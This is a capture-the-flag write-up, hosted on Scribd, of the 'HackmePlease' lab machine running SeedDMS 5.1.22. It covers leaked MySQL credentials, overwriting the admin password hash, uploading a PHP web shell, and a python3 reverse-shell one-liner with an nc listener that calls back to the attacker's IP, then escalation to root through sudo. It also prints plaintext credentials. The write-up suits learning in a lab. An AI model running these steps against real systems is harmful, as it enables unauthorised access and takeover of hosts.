Scribd
Upload
35 views15 pages

Write Up

The document details a penetration testing process on a web application running seedDMS 5.1.22, revealing vulnerabilities through enumeration and exploitation. The tester discovers MySQL credentials, gains access to the database, retrieves user credentials, and exploits an RCE vulnerability to obtain a reverse shell. Ultimately, the tester escalates privileges to root by leveraging found credentials and sudo permissions.

Uploaded by

mileri3088
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
35 views15 pages

Write Up

The document details a penetration testing process on a web application running seedDMS 5.1.22, revealing vulnerabilities through enumeration and exploitation. The tester discovers MySQL credentials, gains access to the database, retrieves user credentials, and exploits an RCE vulnerability to obtain a reverse shell. Ultimately, the tester escalates privileges to root by leveraging found credentials and sudo permissions.

Uploaded by

mileri3088
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

HackmePlease

Ports
3306 33060 80
Open

Done
or Not !

got some hidden directory commented out in the source of the main.js file . visit. got seedDMS 5.1.22 . we
looked in the github repo. got conf directory. got settings.xml file . tried the same in this web. got mysql creds.
Intial
mysql logged in. got some user creds and the hash for admin user to log in . we found the hash. but couldn’t
Shell
crack. we update it. logged in. search for exploit for this version. got a exploit little previous version. tried the
same . exploit . got rce. shell.

OS Linux

Root
switched into another user, using found creds in mysql. sudo -l. all all. root
Shell

Services http mysql

Tag seedDMS 5.1.22

always see the main.js and source very carefully. look each line by line. when got some unknown cms like . try
to get their github repo and see their directory str. see if there some interesting file present or not ? find like
Tips
configuration file, settings.xml file like that .. look for interesting file. if found some directory, direcroty and file
busting into that directory in your target .

Enumeration

Nmap scan report for 192.168.29.214


Host is up, received user-set (0.0011s latency).
Scanned at 2023-10-11 20:16:13 EDT for 14s

PORT STATE SERVICE REASON VERSION


80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Welcome to the land of pwnland
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
3306/tcp open mysql syn-ack MySQL 8.0.25-0ubuntu0.20.04.1
33060/tcp open mysqlx? syn-ack

we visit the port 80 and , there this website is running

HackmePlease 1
we saw the source , and got that there is a main.js file present. we clicked on that.

in the main.js file source we found some comment about the endpoint

HackmePlease 2
we visit the endpoint
http://192.168.29.214/seeddms51x/seeddms-5.1.22/

and it redirects us to http://192.168.29.214/seeddms51x/seeddms-5.1.22/out/out.Login.php?


referuri=%2Fseeddms51x%2Fseeddms-5.1.22%2Fout%2Fout.ViewFolder.php
here seedms is running and from the uri we also got that this is seedms 5.1.22 .

we redirected to login portal.

we tried default creds like admin/admin. didn’t work.


then we searched for the github repo to see it’s directory structure

HackmePlease 3
HackmePlease 4
HackmePlease 5
but

so settings.xml.template file present. So may be settings.xml file also be there .

as mysql is running as shown by nmap , or in general we searched for pass or passwd or password in this page and saw if
there is anything present or not ?

HackmePlease 6
we found a mysql creds,

using this creds we logged in into mysql


┌──(kali kali)-[~/Desktop/PGPractice/HackmePlease]
└─$ mysql -h $ip -u seeddms -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 8.0.25-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;


+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| seeddms |
| sys |
+--------------------+
5 rows in set (0.014 sec)

MySQL [(none)]>

From seedms database we found some credientials

MySQL [(none)]> use seeddms


Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [seeddms]> show tables;
+------------------------------+
| Tables_in_seeddms |
+------------------------------+
| tblACLs |
<SNIP>
| tblWorkflows |
| users |
+------------------------------+
43 rows in set (0.002 sec)

MySQL [seeddms]> select * from users;


+-------------+---------------------+--------------------+-----------------+
| Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |
+-------------+---------------------+--------------------+-----------------+
| 1 | saket | saurav | Saket@#$1337 |
+-------------+---------------------+--------------------+-----------------+
1 row in set (0.001 sec)

MySQL [seeddms]>

we also got some login creds fro admin user .

MySQL [seeddms]> select * from tblUsers;


+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+----
| id | login | pwd | fullName | email | language | theme | comment | role | hidden | pwd
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+----
| 1 | admin | f9ef2c539bad8a6d2f3432b6d49ab51a | Administrator | [email protected] | en_GB | | | 1 | 0 | 202
| 2 | guest | NULL | Guest User | NULL | | | | 2 | 0 | NUL
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+----
2 rows in set (0.001 sec)

HackmePlease 7
looks like it’s an md5 hash .
we tried to crack this hash, but failed .
but we can update the value .
As it seems like an md5 hash , we can generate a hash an update this present pwd hash .

MySQL [seeddms]> update tblUsers set pwd='21232f297a57a5a743894a0e4a801fc3' where id='1';


Query OK, 1 row affected (0.003 sec)
Rows matched: 1 Changed: 1 Warnings: 0

MySQL [seeddms]> select * from tblUsers;


+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+----
| id | login | pwd | fullName | email | language | theme | comment | role | hidden | pwd
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+----
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 | Administrator | [email protected] | en_GB | | | 1 | 0 | 202
| 2 | guest | NULL | Guest User | NULL | | | | 2 | 0 | NUL
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+----
2 rows in set (0.001 sec)

MySQL [seeddms]>

now can we logged in as admin / admin

HackmePlease 8
we have a exploit for seeddms version < 5.1.11 and this is 5.1.22 , may be this version also effected by this exploit .

https://www.exploit-db.com/exploits/47022

HackmePlease 9
we follow the instruction to exploit this application

we scrolled down , and clicked on Add Document

HackmePlease 10
we redirected to a blank page
seemed upload successful

we go to the home page and saw that our cmd.php is present there and when we hover over the mouse cursor , we can see the
document id

HackmePlease 11
or we can click on cmd.php to see the document id.

but

HackmePlease 12
so the document id is present but, the cmd.php isn’t . maybe it’s uploaded in different name.

from the exploit db , we saw that during execution auther use 1.php in the name.

we try the same .

HackmePlease 13
so our cmd.php renamed to 1.php
now we can execute system command

http://192.168.29.214/seeddms51x/data/1048576/4/1.php?cmd=id

we can see that result of id command displayed .

we also saw that python3 is present,

http://192.168.29.214/seeddms51x/data/1048576/4/1.php?cmd=which python3

we use this python3 reverse shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.29.29",80));os.dup2


(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

and set our listener .

nc -nlvp 80

and visit this url

HackmePlease 14
http://192.168.29.214/seeddms51x/data/1048576/4/1.php?cmd=python3 -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.29.29",80));os.dup2(s.file
os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

and we got reverse shell

we switched to user saket using the found credential Saket@#$1337

www-data@ubuntu:/home$ su saket
Password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

saket@ubuntu:/home$

we run sudo -l command and saw we can run any command as root
we ran then, sudo -i and got a root shell.

saket@ubuntu:/home$ sudo -l
[sudo] password for saket:
Matching Defaults entries for saket on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User saket may run the following commands on ubuntu:


(ALL : ALL) ALL
saket@ubuntu:/home$ sudo -i
root@ubuntu:~# su root
root@ubuntu:~# whoami && id
root
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~#

HackmePlease 15

You might also like